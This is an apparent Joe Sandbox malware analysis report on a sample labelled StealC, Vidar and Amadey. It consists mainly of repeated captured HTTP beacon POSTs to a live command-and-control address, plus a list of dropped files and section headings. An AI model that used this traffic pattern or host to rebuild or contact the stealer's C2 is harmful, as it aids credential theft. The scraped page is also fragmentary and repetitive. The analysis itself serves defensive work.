Jul 26, 2024 10:36:32.741381884 CEST	314	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 43 46 44 41 31 34 30 43 32 46 33 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CCFDA140C2F3FD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
Jul 26, 2024 10:36:32.995867014 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 08:36:32 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0
Jul 26, 2024 10:40:25.524977922 CEST	314	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 43 46 44 41 31 34 30 43 32 46 33 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CCFDA140C2F3FD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
Jul 26, 2024 10:40:26.304305077 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 08:40:26 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 10:36:33.165128946 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 10:36:34.928795099 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 08:36:34 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 26, 2024 10:36:34.929675102 CEST	314	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 43 46 44 41 31 34 30 43 32 46 33 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CCFDA140C2F3FD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
Jul 26, 2024 10:36:35.181444883 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 08:36:35 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report file.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: StealC

Threatname: Vidar

Threatname: Amadey

Yara Signatures

PCAP (Network Traffic)

Dropped Files

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Snort Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Compliance

Spreading

Software Vulnerabilities

Networking

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Private

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\ProgramData\CBGCAFII

C:\ProgramData\DAKEBAKFHCFHIEBFBAFBKFCAEH

C:\ProgramData\DGCAAFBFBKFIDGDHJDBKECFBAF

C:\ProgramData\EBFBKFBG

C:\ProgramData\EHCGIJDHDGDBGDGCGCFHJKKECG

C:\ProgramData\FBFHDBKJEGHJJJKFIIJE

Windows Analysis Report
file.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 10:36:35.309453011 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 10:36:36.120749950 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 08:36:35 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 26, 2024 10:36:36.127229929 CEST	314	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 43 46 44 41 31 34 30 43 32 46 33 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CCFDA140C2F3FD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
Jul 26, 2024 10:36:36.379511118 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 08:36:36 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 10:36:36.499150991 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 10:36:37.268436909 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 08:36:37 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 26, 2024 10:36:37.269468069 CEST	314	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 43 46 44 41 31 34 30 43 32 46 33 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CCFDA140C2F3FD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
Jul 26, 2024 10:36:37.536067009 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 08:36:37 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0
Jul 26, 2024 10:40:26.422744989 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 10:40:27.193489075 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 08:40:27 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 10:36:37.669063091 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 10:36:38.416460037 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 08:36:38 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 26, 2024 10:36:38.417506933 CEST	314	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 43 46 44 41 31 34 30 43 32 46 33 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CCFDA140C2F3FD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
Jul 26, 2024 10:36:38.669457912 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 08:36:38 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0
Jul 26, 2024 10:40:27.205276966 CEST	314	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 43 46 44 41 31 34 30 43 32 46 33 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CCFDA140C2F3FD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
Jul 26, 2024 10:40:28.009974003 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 08:40:27 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 10:36:38.794291019 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 10:36:39.620048046 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 08:36:39 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 26, 2024 10:36:39.621002913 CEST	314	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 43 46 44 41 31 34 30 43 32 46 33 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CCFDA140C2F3FD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
Jul 26, 2024 10:36:39.876848936 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 08:36:39 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 10:36:39.997090101 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 10:36:40.767673016 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 08:36:40 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 26, 2024 10:36:40.768506050 CEST	314	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 43 46 44 41 31 34 30 43 32 46 33 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CCFDA140C2F3FD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
Jul 26, 2024 10:36:41.029047966 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 08:36:40 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 10:36:41.155287981 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 10:36:41.896327972 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 08:36:41 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 26, 2024 10:36:41.897897005 CEST	314	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 43 46 44 41 31 34 30 43 32 46 33 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CCFDA140C2F3FD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
Jul 26, 2024 10:36:42.143825054 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 08:36:42 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 10:36:42.262895107 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 10:36:43.028522968 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 08:36:42 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 26, 2024 10:36:43.029427052 CEST	314	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 43 46 44 41 31 34 30 43 32 46 33 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CCFDA140C2F3FD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
Jul 26, 2024 10:36:43.273643970 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 08:36:43 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0
Jul 26, 2024 10:40:28.132266998 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 10:40:28.931302071 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 08:40:28 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 10:36:43.392062902 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 10:36:44.245116949 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 08:36:44 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 26, 2024 10:36:44.246121883 CEST	314	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 43 46 44 41 31 34 30 43 32 46 33 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CCFDA140C2F3FD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
Jul 26, 2024 10:36:44.504781961 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 08:36:44 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 10:36:44.624347925 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 10:36:45.406029940 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 08:36:45 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 26, 2024 10:36:45.406922102 CEST	314	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 43 46 44 41 31 34 30 43 32 46 33 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CCFDA140C2F3FD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
Jul 26, 2024 10:36:45.658788919 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 08:36:45 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0
